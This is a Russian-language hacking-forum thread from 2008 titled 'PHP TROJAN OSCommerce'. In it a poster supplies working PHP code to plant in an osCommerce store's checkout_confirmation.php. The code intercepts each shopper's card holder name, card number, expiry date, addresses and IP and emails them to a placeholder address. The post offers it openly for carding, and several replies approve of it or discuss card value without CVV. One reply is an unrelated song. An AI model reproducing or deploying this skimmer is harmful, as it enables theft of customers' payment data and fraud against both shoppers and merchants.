Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
02.11.2008, 20:10
|
|
Участник форума
Регистрация: 22.10.2007
Сообщений: 138
Провел на форуме:
2454040
Репутация:
177
|
|
PHP TROJAN OSCommerce
OSCommerce один из самых популярных движков для онлайн магазинов
в нем есть встоенный модуль для оплаты кредитными картами, который является лакомым куском для хакеров и кардеров
но все чаще встречаются всяческие способы защиты приватных данных, в случае исли злоумышленник все таки получил доступ к базе данных, то остался с носом, вот наглядный пример
номер карты закрыт в середине крестиками
именно для таких случаев я написал небольшой код, который будет перехватывать важную информацию
теперь имея доступ к файлам магазина, необходимо найти файл checkout_confirmation.php (он обычно находится в корневой папке шопа) и в ставить следующий код после открывающего тэга body:
PHP код:
<?
error_reporting (0);
$ip_holder = $_SERVER['REMOTE_ADDR'];
$tr_deliv_adr = tep_address_format($order->delivery['format_id'], $order->delivery, 1, ' ', ' ');
$tr_bill_adr = tep_address_format($order->billing['format_id'], $order->billing, 1, ' ', ' ');
$tr_cc_owner = $_POST["cc_owner"];
$tr_cc_number= $_POST["cc_number"];
$tr_cc_expires_month = $_POST["cc_expires_month"];
$tr_cc_expires_year= $_POST["cc_expires_year"];
$info_body = "Delivery Address: ";
$info_body .= $tr_deliv_adr."\n";
$info_body .= "----------------------------------\n";
$info_body .= "Billing Address: ";
$info_body .= $tr_bill_adr."\n";
$info_body .= "----------------------------------\n";
$info_body .= "IP holder: ".$ip_holder."\n";
$info_body .= "CC holder: ".$tr_cc_owner."\n";
$info_body .= "CC num: ".$tr_cc_number."\n";
$info_body .= "EXP: ".$tr_cc_expires_month."/".$tr_cc_expires_year."\n";
mail("your@mail.com",'!!! NEW CC !!!',$info_body,"onlineshop.com\r\n");
?>
теперь после каждой совершенной оплаты кредитной картой, на ваше мыло your@mail.com будет высылаться вся необходимая информация
P.S. данный код написан под модуль без использования CVV
P.P.S удачи в хеке 
|
|
|
03.11.2008, 15:07
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
да токо сс без сvv сейчас неочень то актуальны =( надо переделать  |
|
|
|
03.11.2008, 15:14
|
|
Moderator - Level 7
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187
Репутация:
369
|
|
вот что я люблю =)
|
|
|
|
03.11.2008, 15:33
|
|
Участник форума
Регистрация: 13.06.2007
Сообщений: 113
Провел на форуме:
4704149
Репутация:
526
|
|
Сосны фишками
Стол с картишками
Ветер тучки гнал
Шла гроза
Лихо встретили
Забраслетили
А я в мизер играл
Я ж в тузах.
Припев:
Да поздней осенью
Ой Дори-Дори
Небо с проседью
Ой Дори-Дори
Звезды сыпали
Ой Дори-Дори
Вечера
Да листопадами
Ой Дори-Дори
Бабки падали
Ой Дори-Дори
Было весело
Но вчера.
Форма сложная
Пыль дорожная
Приколоченный кабинет
Тундра с елками
Двор с метелками
И на проволоке
Птичек нет.
Припев
Дождь с крапивою
Небо сливою
Прётся радуга
Гриб подрос
Щечки гладкие
Ночки сладкие
В сердце сломанном
Лес унес.
Припев
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
